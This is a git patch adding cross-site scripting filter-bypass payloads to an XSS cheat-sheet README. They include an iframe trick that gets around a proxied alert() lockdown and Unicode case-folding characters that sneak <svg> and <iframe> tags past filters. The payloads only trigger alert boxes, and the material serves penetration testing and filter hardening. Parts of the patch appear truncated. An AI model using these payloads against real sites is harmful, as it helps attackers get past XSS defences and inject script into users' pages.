From c9e13fcc366f082335f3799aac479849a2800289 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sat, 21 Jan 2017 15:38:47 +0100 Subject: [PATCH] XSS Unicode update --- XSS injection/README.md | 43 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) diff --git a/XSS injection/README.md b/XSS injection/README.md index 94f3e0c..5925e40 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -368,6 +368,16 @@ Bypass quotes for string String.fromCharCode(88,83,83) ``` +Bypass quotes in script tag +``` +http://localhost/bla.php?test= + + + +``` + Bypass dot filter ``` ``` +Bypass using an alternate way to trigger an alert +``` +var i = document.createElement("iframe"); +i.onload = function(){ + i.contentWindow.alert(1); +} +document.appendChild(i); + +// Bypassed security +XSSObject.proxy = function (obj, name, report_function_name, exec_original) { + var proxy = obj[name]; + obj[name] = function () { + if (exec_original) { + return proxy.apply(this, arguments); + } + }; + XSSObject.lockdown(obj, name); + }; +XSSObject.proxy(window, 'alert', 'window.alert', false); +``` + + Bypass ';' using another character ``` 'te' * alert('*') * 'xt'; @@ -465,6 +497,17 @@ E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert %EF%BC%9C becomes < ``` +Bypass using unicode converted to uppercase +``` +İ (%c4%b0).toLowerCase() => i +ı (%c4%b1).toUpperCase() => I +ſ (%c5%bf) .toUpperCase() => S +K (%E2%84%AA).toLowerCase() => k + +<ſvg onload=... > become +<ıframe id=x onload=>.toUpperCase() become